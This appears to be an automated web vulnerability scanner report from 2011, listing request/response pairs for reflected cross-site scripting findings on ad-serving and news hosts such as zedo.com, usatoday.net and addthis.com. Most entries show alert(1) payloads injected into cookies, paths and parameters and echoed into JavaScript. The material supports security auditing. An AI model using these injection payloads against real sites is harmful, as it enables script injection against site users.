HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:ac370';alert(1) Set-Cookie: FFcat=1099,2,9;expires Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFChanCap=1589B1099,2 ETag: "ae1b52-8181-4a207a1 Vary: Accept-Encoding X-Varnish: 1332201874 1332193309 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=158 Expires: Mon, 09 May 2011 15:38:49 GMT Date: Mon, 09 May 2011 15:36:11 GMT Connection: close Content-Length: 2055 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',ac370';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=,ac370';alert(1) if(zzuid=='unknown')zzuid var zzhasA ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-406/d3/jsc/fm.js |
GET /bar/v16-406/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:87099";alert(1) Set-Cookie: FFcat=1099,2,9;expires Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "ae1b52-8181-4a207a1 Vary: Accept-Encoding X-Varnish: 1332201874 1332193309 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=158 Expires: Mon, 09 May 2011 15:38:49 GMT Date: Mon, 09 May 2011 15:36:11 GMT Connection: close Content-Length: 2013 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',87099";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=,87099";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; var zzStr ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-406/d3/jsc/fm.js |
GET /bar/v16-406/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=1099,2,9;expires ETag: "ae1b52-8181-4a207a1 Vary: Accept-Encoding X-Varnish: 1332201874 1332193309 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=158 Expires: Mon, 09 May 2011 15:38:49 GMT Date: Mon, 09 May 2011 15:36:11 GMT Connection: close Content-Length: 2010 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='c084f';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=c084f';alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-406/d3/jsc/fm.js |
GET /bar/v16-406/d3/jsc/fm.js Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=1099,2,9;expires ETag: "ae1b52-8181-4a207a1 Vary: Accept-Encoding X-Varnish: 1332201874 1332193309 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=159 Expires: Mon, 09 May 2011 15:38:49 GMT Date: Mon, 09 May 2011 15:36:10 GMT Connection: close Content-Length: 2010 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='4bc88";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=4bc88";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; var zzStr ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-406/d3/jsc/fmr |
GET /bar/v16-406/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:c5170';alert(1) Set-Cookie: FFcat=1099,2,9;expires Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFChanCap=1573B496,121 ETag: "ae1b52-8181-4a207a1 Vary: Accept-Encoding X-Varnish: 1332201874 1332193309 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=159 Expires: Mon, 09 May 2011 15:38:49 GMT Date: Mon, 09 May 2011 15:36:10 GMT Connection: close Content-Length: 2055 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',c5170';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=,c5170';alert(1) if(zzuid=='unknown')zzuid var zzhasA ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-406/d3/jsc/fmr |
GET /bar/v16-406/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=1099:37620";alert(1) Set-Cookie: FFcat=1099,2,9;expires Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path Set-Cookie: FFChanCap=1573B496,121 ETag: "ae1b52-8181-4a207a1 Vary: Accept-Encoding X-Varnish: 1332201874 1332193309 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=159 Expires: Mon, 09 May 2011 15:38:49 GMT Date: Mon, 09 May 2011 15:36:10 GMT Connection: close Content-Length: 2055 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat=',37620";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=,37620";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; var zzStr = "s=1;u=5ajh4goBADQAA ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-406/d3/jsc/fmr |
GET /bar/v16-406/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1573B496,121 Set-Cookie: FFcat=1099,2,9;expires Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "ae1b52-8181-4a207a1 Vary: Accept-Encoding X-Varnish: 1332201874 1332193309 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=159 Expires: Mon, 09 May 2011 15:38:49 GMT Date: Mon, 09 May 2011 15:36:10 GMT Connection: close Content-Length: 2052 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='9688d';alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=9688d';alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://d7.zedo.com |
Path: | /bar/v16-406/d3/jsc/fmr |
GET /bar/v16-406/d3/jsc/fmr Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQA |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1573B496,121 Set-Cookie: FFcat=1099,2,9;expires Set-Cookie: FFad=0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path ETag: "ae1b52-8181-4a207a1 Vary: Accept-Encoding X-Varnish: 1332201874 1332193309 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=159 Expires: Mon, 09 May 2011 15:38:49 GMT Date: Mon, 09 May 2011 15:36:10 GMT Connection: close Content-Length: 2052 // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var p9=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='c34aa";alert(1)/ if(typeof zzStr=='undefined'){ var zzStr="q=c34aa";alert(1)/ if(zzuid=='unknown')zzuid var zzhasAd=undefined; var zzStr = "s=1;u=5ajh4goBADQAA ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://data.usatoday.net |
Path: | /apps/InsidePage |
GET /apps/InsidePage?var Host: data.usatoday.net Proxy-Connection: keep-alive Referer: http://www.usatoday.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Pragma: no-cache Content-Length: 9474 Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Cache-Control: no-cache Expires: Mon, 09 May 2011 15:38:00 GMT Date: Mon, 09 May 2011 15:38:00 GMT Connection: close var blocks = {"url": "5b62f(a)0ff55e3ea5c", ...[SNIP]... tData(String retrieverType, String tags, Int32 count, Dictionary`2 dataparms) at FeedDataService at SuperFeeds.feed ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://data.usatoday.net |
Path: | /apps/InsidePage |
GET /apps/InsidePage?var Host: data.usatoday.net Proxy-Connection: keep-alive Referer: http://www.usatoday.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Pragma: no-cache Content-Length: 12749 Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Cache-Control: no-cache Expires: Mon, 09 May 2011 15:38:00 GMT Date: Mon, 09 May 2011 15:38:00 GMT Connection: close var blocks = {"url": "http://www.usatoday.com ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://data.usatoday.net |
Path: | /apps/InsidePage |
GET /apps/InsidePage?var Host: data.usatoday.net Proxy-Connection: keep-alive Referer: http://www.usatoday.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Pragma: no-cache Content-Length: 12743 Content-Type: application/json; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Cache-Control: no-cache Expires: Mon, 09 May 2011 15:38:00 GMT Date: Mon, 09 May 2011 15:38:00 GMT Connection: close var blocks734a0;alert(1)/ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ds.addthis.com |
Path: | /red/psi/sites/www |
GET /red/psi/sites/www Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: loc=US%2CMjAwMDFOQVV |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 227 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Mon, 09 May 2011 15:38:39 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Wed, 08 Jun 2011 15:38:39 GMT; Path=/ Set-Cookie: di=%7B%7D..1304951889.1FE P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Mon, 09 May 2011 15:38:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 09 May 2011 15:38:39 GMT Connection: close _ate.ad.hpr18cfc<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://event.adxpose.com |
Path: | /event.flow |
GET /event.flow?eventcode=000 Host: event.adxpose.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: evlu=8046e9fe-2ba6-4040 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=6B586A135 Cache-Control: no-store Content-Type: text/javascript;charset Content-Length: 144 Date: Mon, 09 May 2011 15:35:29 GMT Connection: close if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__( |
Severity: | High |
Confidence: | Certain |
Host: | http://finance.fox8live |
Path: | /inergize.wvue |
GET /inergize.wvue?Module Host: finance.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:03 GMT Server: nginx/0.8.15 Content-Type: text/javascript; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Mon, 09 May 2011 15:37:03 GMT X-Cache: MISS from squid1.sv1.financial X-Cache-Lookup: MISS from squid1.sv1.financial Via: 1.0 squid1.sv1.financial Vary: Accept-Encoding Connection: close Content-Length: 794 var head=document.getEle var script=document script.type="text script.src='http:/ head.appendChild(script); _qoptions={ qacct:"p-0cUI5xpPZj8YQ" }; var head=document.getEle var scri ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://finance.fox8live |
Path: | /inergize.wvue |
GET /inergize.wvue98e61'-alert(1)- Host: finance.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:05 GMT Server: nginx/0.8.15 Content-Type: text/javascript; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Mon, 09 May 2011 15:37:05 GMT Expires: Mon, 09 May 2011 15:38:05 GMT X-Cache: MISS from squid2.sv1.financial X-Cache-Lookup: MISS from squid2.sv1.financial Via: 1.0 squid2.sv1.financial Vary: Accept-Encoding Connection: close Content-Length: 41367 document.write('<style>\n document.write('\n'); document.write('\/* Global CSS Styles *\/\n'); document.write('.fcwidget * {\n'); document.write(' padding:0px; \n'); document.write(' border:0px; \n ...[SNIP]... )[0]; var script=document script.type="text script.src='http:/ head.appendChild(script); _ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://finance.fox8live |
Path: | /inergize.wvue |
GET /inergize.wvue?Module Host: finance.fox8live.com Proxy-Connection: keep-alive Referer: http://www.fox8live.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __qca=P0-44190619 |
HTTP/1.1 200 OK Date: Mon, 09 May 2011 15:37:04 GMT Server: nginx/0.8.15 Content-Type: text/javascript; charset=UTF-8 P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Last-Modified: Mon, 09 May 2011 15:37:04 GMT Expires: Mon, 09 May 2011 15:38:04 GMT X-Cache: MISS from squid1.sv1.financial X-Cache-Lookup: MISS from squid1.sv1.financial Via: 1.0 squid1.sv1.financial Vary: Accept-Encoding Connection: close Content-Length: 40716 document.write('<style>\n document.write('\n'); document.write('\/* Global CSS Styles *\/\n'); document.write('.fcwidget * {\n'); document.write(' padding:0px; \n'); document.write(' border:0px; \n ...[SNIP]... script.src='http:/ head.appendChild(script); _qoptions={ qacct:"p-0cUI5xpPZj8YQ" }; var head=document.getEle var script=documen ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=F353BA191 Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:52 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro adsafeSep : "&", re ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.comeec2b"-alert(1)- Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=75C77546E Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:52 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=263751F3F Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:53 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=BDE6C67ED Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:53 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=9A826F056 Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:53 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=8E2371CCF Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:53 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=CEF808169 Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:52 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=F1F0E0C0E Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:51 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
GET /rjss/bs.serving-sys.com Host: fw.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://www.npr.org User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=6C95250B2 Content-Type: text/javascript Content-Length: 8043 Date: Mon, 09 May 2011 15:39:52 GMT Connection: close var adsafeVisParams = { mode : "jss", jsref : "http://www.npr.org adsafeSrc : "http://fw.adsafepro adsafeSep : "&", requrl : "", ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://fw.adsafeprotected |
Path: | /rjss/bs.serving-sys.com |
